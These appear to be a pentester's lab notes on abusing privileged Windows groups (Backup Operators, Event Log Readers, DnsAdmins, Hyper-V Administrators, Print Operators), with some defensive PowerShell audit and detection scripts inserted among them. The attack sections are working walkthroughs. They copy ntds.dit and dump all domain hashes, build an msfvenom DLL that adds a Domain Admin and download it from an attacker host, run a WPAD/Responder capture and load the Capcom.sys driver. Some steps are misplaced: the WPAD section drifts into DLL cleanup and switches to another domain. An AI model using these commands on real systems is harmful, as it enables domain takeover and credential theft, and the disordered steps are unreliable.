Group Privileges

Current User Privileges

PS C:\mrci0x1> whoami /priv
Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeBackupPrivilege             Back up files and directories  Disabled
SeRestorePrivilege            Restore files and directories  Disabled
SeShutdownPrivilege           Shut down the system           Disabled

Group Membership

PS C:\mrci0x1> whoami /groups
Group Name                             Type             SID
BUILTIN\Backup Operators               Alias            S-1-5-32-551

Privileged Groups & Their Dangerous Privileges

Administrators

Full administrative control over systems or domain.

All high privileges: SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeTakeOwnershipPrivilege, SeImpersonatePrivilege, SeLoadDriverPrivilege, SeSecurityPrivilege, SeRemoteInteractiveLogonRight, SeNetworkLogonRight

Complete system or domain takeover.

Server Operators

Can manage services, shares, and backups on servers.

SeBackupPrivilege, SeRestorePrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege

Allows service manipulation, file access, backup abuse, and lateral movement.

Backup Operators

Can access system files, registry hives, and backups on DCs.

SeBackupPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege

Equivalent to Domain Admin due to credential dumping capability (SAM/NTDS).

Print Operators

Can load drivers and access DC consoles.

SeLoadDriverPrivilege

Driver-based privilege escalation via malicious drivers.

Hyper-V Administrators

Controls virtual Domain Controllers.

Full virtualization control (indirect access to all privileges of DC VMs).

Full control over AD virtual infrastructure; can compromise DC VMs directly.

Account Operators

Can modify user/group accounts (non-protected).

May indirectly gain SeImpersonatePrivilege by account manipulation.

Allows creation of privileged accounts for escalation.

Remote Desktop Users

Allowed to log in via RDP.

SeRemoteInteractiveLogonRight

Facilitates lateral movement; privileged RDP sessions can allow privilege abuse.

Remote Management Users

Can log in via PowerShell Remoting.

SeRemoteInteractiveLogonRight; often also able to use SeImpersonatePrivilege indirectly.

Enables remote command execution; abuse possible if privileged tokens exist.

Group Policy Creator Owners

Can create Group Policy Objects (GPOs).

Indirectly allows privilege abuse by backdooring policies to assign SeDebugPrivilege, SeImpersonatePrivilege, etc.

Backdooring via GPO to gain SYSTEM or domain-wide control.

Schema Admins

Can modify Active Directory schema.

Indirect full control over AD by modifying ACLs and schema objects.

Persistent full AD control and long-term escalation paths.

DNS Admins

Can configure DNS settings and load DLLs.

Indirect privilege abuse (e.g., DLL injection).

Persistence and escalation via DLL loading on DCs or DNS abuse (WPAD attacks).
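The table above is only useful if someone regularly checks who is actually in these groups. The following is an added example, not part of the original notes: a PowerShell report that enumerates every member of the listed groups with nested groups expanded, so unexpected accounts can be reviewed. It assumes the ActiveDirectory RSAT module and a domain-joined session; the group list is the one from the section above (DnsAdmins exists only once the DNS Server role is installed, so a missing group is reported rather than treated as an error).

```powershell
# Added example (not from the original notes): audit membership of the
# privileged groups described above. Requires the ActiveDirectory module.
Import-Module ActiveDirectory -ErrorAction Stop

# Group list taken from the table above plus Event Log Readers, which is
# covered later in these notes.
$PrivilegedGroups = @(
    'Administrators', 'Domain Admins', 'Server Operators', 'Backup Operators',
    'Print Operators', 'Hyper-V Administrators', 'Account Operators',
    'Remote Desktop Users', 'Remote Management Users',
    'Group Policy Creator Owners', 'Schema Admins', 'DnsAdmins', 'Event Log Readers'
)

function Get-PrivilegedGroupReport {
    param([string[]]$Groups = $PrivilegedGroups)

    foreach ($g in $Groups) {
        try {
            $group = Get-ADGroup -Identity $g -ErrorAction Stop
        } catch {
            # Schema Admins exist only in the forest root, DnsAdmins only with the DNS role.
            [pscustomobject]@{ Group = $g; Member = '<group not found>'; Class = ''; Enabled = $null }
            continue
        }
        # -Recursive expands nested groups, so an account that was added through
        # an intermediate group is still listed.
        $members = @(Get-ADGroupMember -Identity $group -Recursive -ErrorAction SilentlyContinue)
        if ($members.Count -eq 0) {
            [pscustomobject]@{ Group = $g; Member = '<empty>'; Class = ''; Enabled = $null }
            continue
        }
        foreach ($m in $members) {
            $enabled = $null
            if ($m.objectClass -eq 'user') {
                # Disabled accounts in a privileged group are still worth cleaning up.
                $enabled = (Get-ADUser -Identity $m.distinguishedName).Enabled
            }
            [pscustomobject]@{
                Group   = $g
                Member  = $m.SamAccountName
                Class   = $m.objectClass
                Enabled = $enabled
            }
        }
    }
}

# Review everything that is not an expected administrative account.
Get-PrivilegedGroupReport |
    Where-Object { $_.Member -notin '<empty>', '<group not found>' } |
    Sort-Object Group, Member |
    Format-Table -AutoSize
```

On a member server (for example a Hyper-V host) the same review applies to the local groups; `Get-LocalGroupMember -Group 'Hyper-V Administrators'` gives the equivalent list without the ActiveDirectory module.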


Group Attacks

Backup Operators Group

1. Check Group Membership

PS C:\mrci0x1> whoami /groups
Group Name                             Type             SID
BUILTIN\Backup Operators               Alias            S-1-5-32-551

2. Check Available Privileges

PS C:\mrci0x1> whoami /priv
PRIVILEGE NAME                DESCRIPTION                    STATE
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeBackupPrivilege             Back up files and directories  Disabled
SeRestorePrivilege            Restore files and directories  Disabled
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

3. Load the SeBackupPrivilege Modules and Enable the Privilege

PS C:\mrci0x1> Import-Module .\SeBackupPrivilegeUtils.dll
PS C:\mrci0x1> Import-Module .\SeBackupPrivilegeCmdLets.dll

PS C:\htb> Get-SeBackupPrivilege
SeBackupPrivilege is disabled
PS C:\htb> Set-SeBackupPrivilege
PS C:\htb> Get-SeBackupPrivilege
SeBackupPrivilege is enabled

4. Confirm Privileges After Enabling

PS C:\mrci0x1> whoami /priv
Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Disabled

5. List Target Directory Contents

PS C:\mrci0x1> dir C:\Confidential\
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         5/6/2021   1:01 PM             88 2021 Contract.txt

6. Attempt Direct Access to Protected File

PS C:\mrci0x1> Get-Content 'C:\Confidential\2021 Contract.txt'
cat : Access to the path 'C:\Confidential\2021 Contract.txt' is denied.
At line:1 char:1
+ cat 'C:\Confidential\2021 Contract.txt'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Confidential\2021 Contract.txt:String) [Get-Content], Unauthor
   izedAccessException
    + FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand

7. Copy Protected File with SeBackupPrivilege

PS C:\mrci0x1> Copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt
Copied 88 bytes

8. Read Copied Protected File

PS C:\mrci0x1> cat .\Contract.txt

9. Start DiskShadow to Create Shadow Copy

PS C:\mrci0x1> diskshadow.exe
Microsoft DiskShadow version 1.0

Inside diskshadow:

DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit

10. List Files from Shadow Copy

PS C:\mrci0x1> dir E:\
   Directory: E:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         5/6/2021   1:00 PM                Confidential
d-----        9/15/2018  12:19 AM                PerfLogs
d-r---        3/24/2021   6:20 PM                Program Files
d-----        9/15/2018   2:06 AM                Program Files (x86)
d-----         5/6/2021   1:05 PM                Tools
d-r---         5/6/2021  12:51 PM                Users
d-----        3/24/2021   6:38 PM                Windows

11. Copy NTDS.dit from Shadow Copy

PS C:\mrci0x1> Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
Copied 16777216 bytes

12. Save SYSTEM Hive

C:\mrci0x1> reg save HKLM\SYSTEM SYSTEM.SAV
The operation completed successfully.

13. Save SAM Hive

C:\mrci0x1> reg save HKLM\SAM SAM.SAV
The operation completed successfully.

14. Load DSInternals, Extract the Boot Key and the Administrator Hash

PS C:\htb> Import-Module .\DSInternals.psd1
PS C:\htb> $key = Get-BootKey -SystemHivePath .\SYSTEM
PS C:\htb> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key
Secrets
NTHash: cf3a5525ee9414229e66279623ed5c58
NTLMStrongHash: 7790d8406b55c380f98b92bb2fdc63a7
AES256 Key: 5db9c9ada113804443a8aeb64f500cd3e9670348719ce1436bcc95d1d93dad43

15. Extract All Hashes with secretsdump.py

mrci0x1@htb$ secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
Impacket v0.9.23.dev1+20210504.123629.24a0ae6f - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0xc0a9116f907bd37afaaa845cb87d0550
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 85541c20c346e3198a3ae2c09df7f330
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WINLPE-DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7abf052dcef31f6305f1d4c84dfa7484:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a05824b8c279f2eb31495a012473d129:::
htb-student:1103:aad3b435b51404eeaad3b435b51404ee:2487a01dd672b583415cb52217824bb5:::

16. Alternative: Copy NTDS.dit via Robocopy

C:\mrci0x1> robocopy /B E:\Windows\NTDS .\ntds ntds.dit
-------------------------------------------------------------------------------
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------

  Started : Thursday, May 6, 2021 1:11:47 PM
   Source : E:\Windows\NTDS\
     Dest : C:\Tools\ntds\

    Files : ntds.dit

  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

          New Dir          1    E:\Windows\NTDS\
100%        New File              16.0 m        ntds.dit
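Every step of the Backup Operators procedure above is a process creation or a privilege use, so it is visible in the Security log. The following is an added example, not part of the original notes: a PowerShell detection that walks 4688 (process creation) and 4673/4674 (sensitive privilege use) events and flags shadow-copy tooling, `reg save` of the SAM/SYSTEM/SECURITY hives, anything touching ntds.dit, `robocopy /B`, and any recorded use of SeBackupPrivilege or SeRestorePrivilege. The rule names and the sample records at the bottom are constructed; the property indices for 4688 (`[1]` SubjectUserName, `[5]` NewProcessName, `[8]` CommandLine) are the standard ones the notes themselves rely on.

```powershell
# Added example (not from the original notes): detect the traces left by the
# Backup Operators procedure above. Command-line auditing must be enabled for
# 4688 Properties[8] to be populated.
$Rules = @(
    @{ Name = 'Shadow copy tooling';    Field = 'Process';     Pattern = '\\(diskshadow|vssadmin|wbadmin)\.exe$' }
    @{ Name = 'SAM/SYSTEM hive export'; Field = 'CommandLine'; Pattern = '\breg(\.exe)?\s+save\s+HKLM\\(SAM|SYSTEM|SECURITY)\b' }
    @{ Name = 'ntds.dit access';        Field = 'CommandLine'; Pattern = 'ntds\.dit' }
    @{ Name = 'robocopy backup mode';   Field = 'CommandLine'; Pattern = '\brobocopy\b.*\s/B\b' }
)

function Test-BackupAbuseEvent {
    param([Parameter(Mandatory)] $Event)   # one 4688 or 4673/4674 record

    if ($Event.Id -eq 4688) {
        $user    = [string]$Event.Properties[1].Value
        $process = [string]$Event.Properties[5].Value
        $cmdline = [string]$Event.Properties[8].Value
        foreach ($r in $Rules) {
            $value = if ($r.Field -eq 'Process') { $process } else { $cmdline }
            if ($value -match $r.Pattern) {
                return [pscustomobject]@{
                    Time = $Event.TimeCreated; User = $user; Rule = $r.Name
                    Process = $process; CommandLine = $cmdline
                }
            }
        }
    }
    elseif ((4673, 4674) -contains $Event.Id -and $Event.Message -match 'Se(Backup|Restore)Privilege') {
        return [pscustomobject]@{
            Time = $Event.TimeCreated; User = [string]$Event.Properties[1].Value
            Rule = 'Backup/Restore privilege used'; Process = ''
            CommandLine = ($Event.Message -split "`n")[0]
        }
    }
    return $null
}

function Get-BackupAbuseEvents {
    # Live query against the Security log of the given host.
    param([int]$MaxEvents = 5000, [string]$ComputerName = $env:COMPUTERNAME)
    $filter = @{ LogName = 'Security'; Id = 4688, 4673, 4674 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ComputerName $ComputerName |
        ForEach-Object { Test-BackupAbuseEvent $_ } |
        Where-Object { $_ }
}

# --- Constructed sample records, shaped like EventLogRecord, for an offline check ---
function New-Sample4688 { param($User, $Process, $CommandLine)
    $props = 0..9 | ForEach-Object { [pscustomobject]@{ Value = '' } }
    $props[1].Value = $User; $props[5].Value = $Process; $props[8].Value = $CommandLine
    [pscustomobject]@{ Id = 4688; TimeCreated = Get-Date; Properties = $props; Message = '' }
}
$Samples = @(
    New-Sample4688 'svc_backup' 'C:\Windows\System32\diskshadow.exe' 'diskshadow.exe'
    New-Sample4688 'svc_backup' 'C:\Windows\System32\reg.exe'        'reg save HKLM\SAM SAM.SAV'
    New-Sample4688 'svc_backup' 'C:\Windows\System32\Robocopy.exe'   'robocopy /B E:\Windows\NTDS .\ntds ntds.dit'
    New-Sample4688 'jdoe'       'C:\Windows\System32\notepad.exe'    'notepad.exe notes.txt'   # benign, not reported
)
$Samples | ForEach-Object { Test-BackupAbuseEvent $_ } | Where-Object { $_ } |
    Format-Table Rule, User, CommandLine -AutoSize
```

Two caveats for live use: Windows does not record every use of the backup and restore privileges unless the security option "Audit: Audit the use of Backup and Restore privilege" is enabled, so the 4673/4674 branch is usually silent on default settings and the 4688 rules carry the detection; and on a domain controller the same query should be run against the DC's own log, since that is where ntds.dit is copied from.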

Event Log Readers Group

1. Check Event Log Readers Group Membership

C:\mrci0x1> net localgroup "Event Log Readers"
Alias name     Event Log Readers
Comment        Members of this group can read event logs from local machine

Members

-------------------------------------------------------------------------------
logger
The command completed successfully

2. Query Security Logs Using wevtutil (Local)

PS C:\mrci0x1> wevtutil qe Security /rd:true /f:text | Select-String "/user"
Process Command Line:   net use T: \\fs01\backups /user:tim MyStr0ngP@ssword

Query Security Logs Using wevtutil (Remote With Alternate Credentials)

C:\mrci0x1> wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"
Process Command Line:   net use T: \\fs01\backups /user:tim MyStr0ngP@ssword

Query Event ID 4688 Using Get-WinEvent (Admin Required)

PS C:\mrci0x1> Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}
CommandLine
-----------
net use T: \\fs01\backups /user:tim MyStr0ngP@ssword

Query Get-WinEvent With Alternate Credentials

PS C:\mrci0x1> $cred = Get-Credential
PS C:\mrci0x1> Get-WinEvent -LogName Security -Credential $cred | Where-Object { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'}
CommandLine
-----------
net use T: \\fs01\backups /user:tim MyStr0ngP@ssword

3. Check PowerShell Operational Log

PS C:\mrci0x1> Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" -MaxEvents 10

4. Check Application Log for Credentials

PS C:\mrci0x1> wevtutil qe Application /rd:true /f:text | Select-String "password"
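The value of Event Log Readers to an attacker comes entirely from credentials that operators have typed on command lines, as the `net use ... /user:tim MyStr0ngP@ssword` lines above show. The following is an added example, not part of the original notes: a PowerShell scan that finds such 4688 events but reports the command line with the secret masked, so the finding can be handed to whoever owns the script or scheduled task without copying the password a second time. The credential patterns and the sample records are constructed; the two sample command lines are the ones quoted in this section.

```powershell
# Added example (not from the original notes): find credentials embedded in
# process command lines (4688) and report them redacted.

# Each pattern captures the secret in the named group 'secret'.
$CredentialPatterns = @(
    '/user:\S+\s+(?<secret>\S+)'                          # net use ... /user:tim <password>
    '(?:^|\s)/p:(?<secret>\S+)'                           # wevtutil ... /p:<password>
    '(?:^|\s)-p\s+(?<secret>\S+)'                         # tools taking -p <password>
    '(?:^|\s)(?:-|/)?pass(?:word)?[=:\s]+(?<secret>\S+)'  # password=..., -Password ...
)

function Hide-Secret {
    param([string]$CommandLine)
    $hits = 0
    foreach ($p in $CredentialPatterns) {
        $m = [regex]::Match($CommandLine, $p, 'IgnoreCase')
        if ($m.Success) {
            $hits++
            # Replace the secret with asterisks of the same length so later
            # pattern offsets stay valid and the string keeps its shape.
            $g = $m.Groups['secret']
            $CommandLine = $CommandLine.Substring(0, $g.Index) + ('*' * $g.Length) +
                           $CommandLine.Substring($g.Index + $g.Length)
        }
    }
    [pscustomobject]@{ Matched = ($hits -gt 0); Redacted = $CommandLine }
}

function Find-CommandLineCredentials {
    param([Parameter(ValueFromPipeline)] $Event)   # 4688 records
    process {
        if ($Event.Id -ne 4688) { return }
        $r = Hide-Secret ([string]$Event.Properties[8].Value)
        if ($r.Matched) {
            [pscustomobject]@{
                Time        = $Event.TimeCreated
                Account     = "$($Event.Properties[2].Value)\$($Event.Properties[1].Value)"
                Process     = [string]$Event.Properties[5].Value
                CommandLine = $r.Redacted
            }
        }
    }
}

# Live use (needs Event Log Readers or admin, and command-line auditing enabled):
#   Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} -MaxEvents 20000 | Find-CommandLineCredentials

# --- Constructed samples shaped like EventLogRecord ---
function New-Sample4688 { param($Domain, $User, $Process, $CommandLine)
    $props = 0..9 | ForEach-Object { [pscustomobject]@{ Value = '' } }
    $props[1].Value = $User; $props[2].Value = $Domain
    $props[5].Value = $Process; $props[8].Value = $CommandLine
    [pscustomobject]@{ Id = 4688; TimeCreated = Get-Date; Properties = $props }
}
$Samples = @(
    New-Sample4688 'INLANEFREIGHT' 'logger' 'C:\Windows\System32\net.exe' 'net use T: \\fs01\backups /user:tim MyStr0ngP@ssword'
    New-Sample4688 'INLANEFREIGHT' 'logger' 'C:\Windows\System32\wevtutil.exe' 'wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1'
    New-Sample4688 'INLANEFREIGHT' 'logger' 'C:\Windows\System32\cmd.exe' 'cmd /c dir C:\Users'   # benign
)
$Samples | Find-CommandLineCredentials | Format-Table Account, Process, CommandLine -AutoSize
```

Each reported line is a credential to rotate and a script to fix; the permanent mitigation is to stop passing passwords on command lines at all (Credential Manager, gMSA accounts or a vault), because command-line auditing is valuable enough elsewhere that disabling it is the wrong fix.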

DnsAdmins Group

A. Attack on DnsAdmins Group by DLL Injection

1. Check Membership in DnsAdmins Group

PS C:\mrci0x1> Get-ADGroupMember -Identity DnsAdmins
distinguishedName : CN=netadm,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
name              : netadm
objectClass       : user
objectGUID        : 1a1ac159-f364-4805-a4bb-7153051a8c14
SamAccountName    : netadm
SID               : S-1-5-21-669053619-2741956077-1013132368-1109

2. Generate Malicious DLL

mrci0x1@htb[/htb]$ msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 313 bytes
Final size of dll file: 5120 bytes
Saved as: adduser.dll

3. Host DLL via HTTP

mrci0x1@htb[/htb]$ python3 -m http.server 7777

4. Download DLL on Domain Controller

PS C:\mrci0x1> wget "http://10.10.14.4:7777/adduser.dll" -outfile "adduser.dll"

5. Load DLL via dnscmd

C:\mrci0x1> dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.

6. Verify DNS Service Permissions

C:\mrci0x1> wmic useraccount where name="netadm" get sid
SID
S-1-5-21-669053619-2741956077-1013132368-1109
C:\mrci0x1> sc.exe sdshow DNS
D:(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)(A;;RPWP;;;S-1-5-21-669053619-2741956077-1013132368-1109)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

7. Stop DNS Service

C:\mrci0x1> sc stop dns
SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x1
        WAIT_HINT          : 0x7530

8. Start DNS Service

C:\mrci0x1> sc start dns
SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 6960

9. Verify Domain Admin Membership

C:\mrci0x1> net group "Domain Admins" /dom
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator            netadm
The command completed successfully

10. Spawn Elevated Session

C:\mrci0x1> runas /user:INLANEFREIGHT\netadm cmd

This completes the DnsAdmins DLL-injection attack: after the DNS service restart, netadm is a member of Domain Admins.


B. Attack on DnsAdmins by Creating a WPAD Record

1. Disable Global Query Block List

PS C:\mrci0x1> Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.local

Disables the global query block list, which normally stops the DNS server from answering queries for wpad and isatap, so the record added next will be resolved.


2. Add WPAD DNS Record

PS C:\mrci0x1> Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.3

3. Start Responder for Hash Capture

sudo responder -I eth0 -wf

4. Crack Captured Hashes

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

5. Verify Malicious DLL in Registry

C:\mrci0x1> reg query \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters
    GlobalQueryBlockList    REG_MULTI_SZ    wpad\0isatap
    EnableGlobalQueryBlockList    REG_DWORD    0x1
    PreviousLocalHostname    REG_SZ    WINLPE-DC01.INLANEFREIGHT.LOCAL
    Forwarders    REG_MULTI_SZ    1.1.1.1\08.8.8.8
    ForwardingTimeout    REG_DWORD    0x3
    IsSlave    REG_DWORD    0x0
    BootMethod    REG_DWORD    0x3
    AdminConfigured    REG_DWORD    0x1
    ServerLevelPluginDll    REG_SZ    adduser.dll

6. Delete DLL Registry Entry

C:\mrci0x1> reg delete \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll
Delete the registry value ServerLevelPluginDll (Yes/No)? Y
The operation completed successfully.

7. Restart DNS Service After Cleanup

C:\mrci0x1>  sc start dns

8. Verify DNS Service Running

C:\mrci0x1>  sc query dns
SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 4984
        FLAGS              :

9. Remove WPAD Record and Re-enable Block List

Remove-DnsServerResourceRecord -ZoneName transglobal.local -RRType A -Name wpad -ComputerName dc01.transglobal.local

Set-DnsServerGlobalQueryBlockList -Enable $true -ComputerName dc01.transglobal.local
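Both DnsAdmins attacks above leave server-side configuration behind: a `ServerLevelPluginDll` value, a disabled or trimmed Global Query Block List, and a `wpad` host record. The following is an added example, not part of the original notes: a PowerShell check that verifies all three on a DNS server and reports each as OK or ALERT. It assumes the DnsServer RSAT module and WinRM access to the server for the registry read; the server and zone names are parameters, and the values shown in the usage line are the lab names from these notes, not a recommendation.

```powershell
# Added example (not from the original notes): verify the DNS server settings
# that the two DnsAdmins procedures above modify.
Import-Module DnsServer -ErrorAction Stop

function Test-DnsServerHardening {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [Parameter(Mandatory)][string]$ZoneName
    )
    $findings = New-Object System.Collections.Generic.List[object]
    function Add-Finding($Check, $Status, $Detail) {
        $findings.Add([pscustomobject]@{ Check = $Check; Status = $Status; Detail = $Detail })
    }

    # 1. ServerLevelPluginDll is absent on a healthy server. Any value means the
    #    DNS service loads that DLL as SYSTEM the next time it starts.
    $plugin = Invoke-Command -ComputerName $ComputerName -ScriptBlock {
        (Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters' `
            -ErrorAction SilentlyContinue).ServerLevelPluginDll
    }
    if ([string]::IsNullOrEmpty($plugin)) {
        Add-Finding 'ServerLevelPluginDll' 'OK' 'not set'
    } else {
        Add-Finding 'ServerLevelPluginDll' 'ALERT' "set to '$plugin' - remove the value and restart the DNS service"
    }

    # 2. The Global Query Block List must be enabled and still contain wpad and isatap.
    $gqbl = Get-DnsServerGlobalQueryBlockList -ComputerName $ComputerName
    if (-not $gqbl.Enable) {
        Add-Finding 'GlobalQueryBlockList' 'ALERT' 'disabled (re-enable with Set-DnsServerGlobalQueryBlockList -Enable $true)'
    }
    foreach ($name in 'wpad', 'isatap') {
        if ($gqbl.List -notcontains $name) {
            Add-Finding 'GlobalQueryBlockList' 'ALERT' "'$name' missing from the list"
        }
    }
    if ($gqbl.Enable -and ($gqbl.List -contains 'wpad') -and ($gqbl.List -contains 'isatap')) {
        Add-Finding 'GlobalQueryBlockList' 'OK' ($gqbl.List -join ', ')
    }

    # 3. A wpad (or isatap) A record in the zone lets whoever owns that address
    #    hand proxy settings to every client that auto-discovers.
    foreach ($name in 'wpad', 'isatap') {
        $rr = Get-DnsServerResourceRecord -ComputerName $ComputerName -ZoneName $ZoneName `
                -Name $name -RRType A -ErrorAction SilentlyContinue
        if ($rr) {
            $addresses = @($rr | ForEach-Object { $_.RecordData.IPv4Address.IPAddressToString }) -join ', '
            Add-Finding "$name record" 'ALERT' "A record present, points to $addresses"
        } else {
            Add-Finding "$name record" 'OK' 'no A record in zone'
        }
    }
    return $findings
}

# Usage (lab names from these notes; substitute the server and zone being audited):
Test-DnsServerHardening -ComputerName dc01.inlanefreight.local -ZoneName inlanefreight.local |
    Format-Table -AutoSize
```

The block list only suppresses answers; it does not remove the record, which is why the cleanup step above both deletes the record and re-enables the list. Because every one of these settings is writable by DnsAdmins, the check is a compensating control: the underlying fix is the membership review of DnsAdmins itself.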

Hyper-V Administrators

If Domain Controllers have been virtualized, then the virtualization admins should be considered Domain Admins.

If the operating system is vulnerable to CVE-2018-0952 or CVE-2019-0841, we can leverage this to gain SYSTEM privileges. Otherwise, we can try to take advantage of an application on the server that has installed a service running in the context of SYSTEM, which is startable by unprivileged users.

For example, the Firefox Maintenance Service: https://raw.githubusercontent.com/decoder-it/Hyper-V-admin-EOP/master/hyperv-eop.ps1

After running the PowerShell script, we should have full control of this file and can take ownership of it.

C:\mrci0x1> takeown /F "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"

Next, we can replace this file with a malicious maintenanceservice.exe, start the maintenance service, and get command execution as SYSTEM.

C:\mrci0x1> sc.exe start MozillaMaintenance

Note: This vector has been mitigated by the March 2020 Windows security updates, which changed behavior relating to hard links.

Print Operators Group

1. Check Current Privileges

PS C:\mrci0x1> whoami /priv
PRIVILEGES INFORMATION
----------------------

Privilege Name           Description                          State
======================== =================================    =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process   Disabled
SeChangeNotifyPrivilege  Bypass traverse checking             Enabled
SeShutdownPrivilege      Shut down the system                 Disabled

Bypass UAC (if required)

PS C:\mrci0x1> runas /user:INLANEFREIGHT\printsvc cmd

2. Check Privileges Again

PS C:\mrci0x1> whoami /priv
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================  ==========
SeMachineAccountPrivilege     Add workstations to domain           Disabled
SeLoadDriverPrivilege         Load and unload device drivers       Disabled
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled

3. Compile EnableSeLoadDriverPrivilege

PS C:\mrci0x1> cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp
Microsoft (R) C/C++ Optimizing Compiler Version 19.28.29913 for x86
Copyright (C) Microsoft Corporation.  All rights reserved.

EnableSeLoadDriverPrivilege.cpp
Microsoft (R) Incremental Linker Version 14.28.29913.0
Copyright (C) Microsoft Corporation.  All rights reserved.

/out:EnableSeLoadDriverPrivilege.exe
EnableSeLoadDriverPrivilege.obj

4. Add Registry Key for Capcom.sys

PS C:\mrci0x1> reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"
The operation completed successfully.
PS C:\mrci0x1> reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1
The operation completed successfully.

5. Verify Driver Status (before load)

PS C:\mrci0x1> .\DriverView.exe /stext drivers.txt
PS C:\mrci0x1> cat drivers.txt | Select-String -pattern Capcom

